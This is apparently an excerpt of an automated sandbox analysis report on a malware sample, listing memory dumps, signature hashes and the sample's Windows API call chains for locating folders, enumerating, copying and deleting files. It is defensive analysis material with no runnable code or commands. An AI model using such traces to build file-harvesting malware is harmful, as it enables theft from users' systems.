                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                                • String ID:
                                                • API String ID: 941982115-0
                                                • Opcode ID: 5d3735d569cffe7bbea000e7acfc03b16a2d4300877d619867e3aa12521868c8
                                                • Instruction ID: 0d36a2049334a0a8ca1aac51ef1be1fd8991aa448b03f055e8d3728f3c274c79
                                                • Opcode Fuzzy Hash: 5d3735d569cffe7bbea000e7acfc03b16a2d4300877d619867e3aa12521868c8
                                                • Instruction Fuzzy Hash: 77F03A78A8062DBBE710ABE0EC09BBD7675FF05755F101918B502E5190EBB14580CA57
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: `o@
                                                • API String ID: 0-590292170
                                                • Opcode ID: 7ad59576bd09cc7eceacd48e5d7f84764234e902501c4ca3efc067249123903a
                                                • Instruction ID: c65cc5113f4fbf7636557f8b1f026e9f2285814709fd8c8344c4410f81c0aea8
                                                • Opcode Fuzzy Hash: 7ad59576bd09cc7eceacd48e5d7f84764234e902501c4ca3efc067249123903a
                                                • Instruction Fuzzy Hash: A66138B4900219EFCB14DF94E944BEEB7B1BB04304F1185AAE40A77380D739AEA4DF95
                                                APIs
                                                  • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                                • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00414BEA
                                                • lstrcatA.KERNEL32(?,008C9C00), ref: 00414C08
                                                  • Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
                                                  • Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943
                                                  • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
                                                  • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
                                                  • Part of subcall function 00414910: FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
                                                  • Part of subcall function 00414910: FindClose.KERNEL32(000000FF), ref: 00414B92
                                                  • Part of subcall function 00414910: wsprintfA.USER32 ref: 004149B0
                                                  • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,004208D2), ref: 004149C5
                                                  • Part of subcall function 00414910: wsprintfA.USER32 ref: 004149E2
                                                  • Part of subcall function 00414910: PathMatchSpecA.SHLWAPI(?,?), ref: 00414A1E
                                                  • Part of subcall function 00414910: lstrcatA.KERNEL32(?,008CADE0,?,000003E8), ref: 00414A4A
                                                  • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00420FF8), ref: 00414A5C
                                                  • Part of subcall function 00414910: lstrcatA.KERNEL32(?,?), ref: 00414A70
                                                  • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00420FFC), ref: 00414A82
                                                  • Part of subcall function 00414910: lstrcatA.KERNEL32(?,?), ref: 00414A96
                                                  • Part of subcall function 00414910: CopyFileA.KERNEL32(?,?,00000001), ref: 00414AAC
                                                  • Part of subcall function 00414910: DeleteFileA.KERNEL32(?), ref: 00414B31
                                                  • Part of subcall function 00414910: wsprintfA.USER32 ref: 00414A07
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                                • String ID: UaA
                                                • API String ID: 2104210347-3893042857
                                                • Opcode ID: 8ba6efb70901ca5478d437239848c433a21302fddde02a53de9488f6e8c4bcee
                                                • Instruction ID: 5a37e5a53a2562059c730f6b0b3ae842953eee94398a2728108a858f2c1bafc2
                                                • Opcode Fuzzy Hash: 8ba6efb70901ca5478d437239848c433a21302fddde02a53de9488f6e8c4bcee
                                                • Instruction Fuzzy Hash: 9341C5BA6001047BD754FBB0EC42EEE337DA785700F40851DB54A96186EE795BC88BA6
                                                APIs
                                                  • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                • GetSystemTime.KERNEL32(?,008948D0,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: SystemTimelstrcpy
                                                • String ID: cI@$cI@
                                                • API String ID: 62757014-1697673767
                                                • Opcode ID: 728e3afec194442a0a20c9b4cf47b2a0a0f7365ad80767aaeb7a96b2b5f46ac6
                                                • Instruction ID: 15f3dfc6f8d56a301bf8b2a7a9260479b6db203ca669f730be279af5ebf73ee3
                                                • Opcode Fuzzy Hash: 728e3afec194442a0a20c9b4cf47b2a0a0f7365ad80767aaeb7a96b2b5f46ac6
                                                • Instruction Fuzzy Hash: 7111E971D00008AFCB04EFA9C8919EE77B9EF58314F04C05EF01667241DF38AA86CBA6
                                                APIs
                                                  • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                                • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 0041508A
                                                • lstrcatA.KERNEL32(?,008C9568), ref: 004150A8
                                                  • Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
                                                  • Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrcat$FileFindFirstFolderPathwsprintf
                                                • String ID: aA
                                                • API String ID: 2699682494-2567749500
                                                • Opcode ID: d64dcdbc5a5b078ecf4a674937750308087945107cc9d2085dbcd85f67f2e6ce
                                                • Instruction ID: 27646669aa04729862e240b26620d37997e147c17b59a732ce93ef494e7ce50b
                                                • Opcode Fuzzy Hash: d64dcdbc5a5b078ecf4a674937750308087945107cc9d2085dbcd85f67f2e6ce
                                                • Instruction Fuzzy Hash: B801D6BAA4020877C714FBB0DC42EEE333CAB55304F00415DB68A570D1EE789AC88BA6
                                                APIs
                                                  • Part of subcall function 0082A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0082A9EF
                                                  • Part of subcall function 0082AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 0082AC2C
                                                  • Part of subcall function 0082AC17: lstrcpy.KERNEL32(00000000), ref: 0082AC6B
                                                  • Part of subcall function 0082AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0082AC79
                                                  • Part of subcall function 0082AB87: lstrcpy.KERNEL32(00000000,?), ref: 0082ABD9
                                                  • Part of subcall function 0082AB87: lstrcat.KERNEL32(00000000), ref: 0082ABE9
                                                  • Part of subcall function 0082AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0082AB6C
                                                  • Part of subcall function 0082AA07: lstrcpy.KERNEL32(?,00000000), ref: 0082AA4D
                                                  • Part of subcall function 0081A077: memcmp.MSVCRT(?,00421264,00000003), ref: 0081A094
                                                • lstrlen.KERNEL32(00000000), ref: 0081BF06
                                                  • Part of subcall function 00829097: LocalAlloc.KERNEL32(00000040,-00000001), ref: 008290B9
                                                • StrStrA.SHLWAPI(00000000,004213E0), ref: 0081BF34
                                                • lstrlen.KERNEL32(00000000), ref: 0081C00C
                                                • lstrlen.KERNEL32(00000000), ref: 0081C020
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrcpy$lstrlen$lstrcat$AllocLocalmemcmp
                                                • String ID:
                                                • API String ID: 1440504306-0
                                                • Opcode ID: 9e08ee45ebc43fe706c0c8ad989736c962bf943befa7584f1b5ac42d019a3d06
                                                • Instruction ID: 4e1800f20d41b9eea4f40b7b0a9363257efd4db51d368f3cd98d4d0b1699972d
                                                • Opcode Fuzzy Hash: 9e08ee45ebc43fe706c0c8ad989736c962bf943befa7584f1b5ac42d019a3d06
                                                • Instruction Fuzzy Hash: 7DB1FC75910228EBCF18EBA4ED96EED7379FF54700F404169B506E2491EE346A88CF63
                                                APIs
                                                  • Part of subcall function 00829047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00829072
                                                • lstrcat.KERNEL32(?,00000000), ref: 008251E1
                                                • lstrcat.KERNEL32(?,00421070), ref: 008251FE
                                                • lstrcat.KERNEL32(?,0064A5F8), ref: 00825212
                                                • lstrcat.KERNEL32(?,00421074), ref: 00825224
                                                  • Part of subcall function 00824B77: wsprintfA.USER32 ref: 00824B93
                                                  • Part of subcall function 00824B77: FindFirstFileA.KERNEL32(?,?), ref: 00824BAA
                                                  • Part of subcall function 00824B77: StrCmpCA.SHLWAPI(?,00420FDC), ref: 00824BD8
                                                  • Part of subcall function 00824B77: StrCmpCA.SHLWAPI(?,00420FE0), ref: 00824BEE
                                                  • Part of subcall function 00824B77: FindNextFileA.KERNEL32(000000FF,?), ref: 00824DE4
                                                  • Part of subcall function 00824B77: FindClose.KERNEL32(000000FF), ref: 00824DF9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                                • String ID:
                                                • API String ID: 2667927680-0
                                                • Opcode ID: fea607eff97497eb4fd5309f6b34a87d5e7f8ff3753410a5b2e417b1bb1efa56
                                                • Instruction ID: 317398f7e90c0ee717ae51701e6a91a7476cf2cde122981038ac6e46225c5284
                                                • Opcode Fuzzy Hash: fea607eff97497eb4fd5309f6b34a87d5e7f8ff3753410a5b2e417b1bb1efa56
                                                • Instruction Fuzzy Hash: 8A21B67AA40218BBCB14FBE4EC46EE9737DFF55300F404588B685D2181DE7496C98BA3
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrcpynlstrlenwsprintf
                                                • String ID:
                                                • API String ID: 1206339513-0
                                                • Opcode ID: bda2825dd20141c14e66db048f7389e73ec0fb40efc247105e9df97f2adce381
                                                • Instruction ID: b4e3c74c2c9e63a4a4cc4d36bdfa5ddb587bfcbeb0d72c4d8cabba810aa44c98
                                                • Opcode Fuzzy Hash: bda2825dd20141c14e66db048f7389e73ec0fb40efc247105e9df97f2adce381
                                                • Instruction Fuzzy Hash: 8401DE79540108FFCB04DFECD994EAE7BBAEF45354F108148F9499B301C635AA41DB95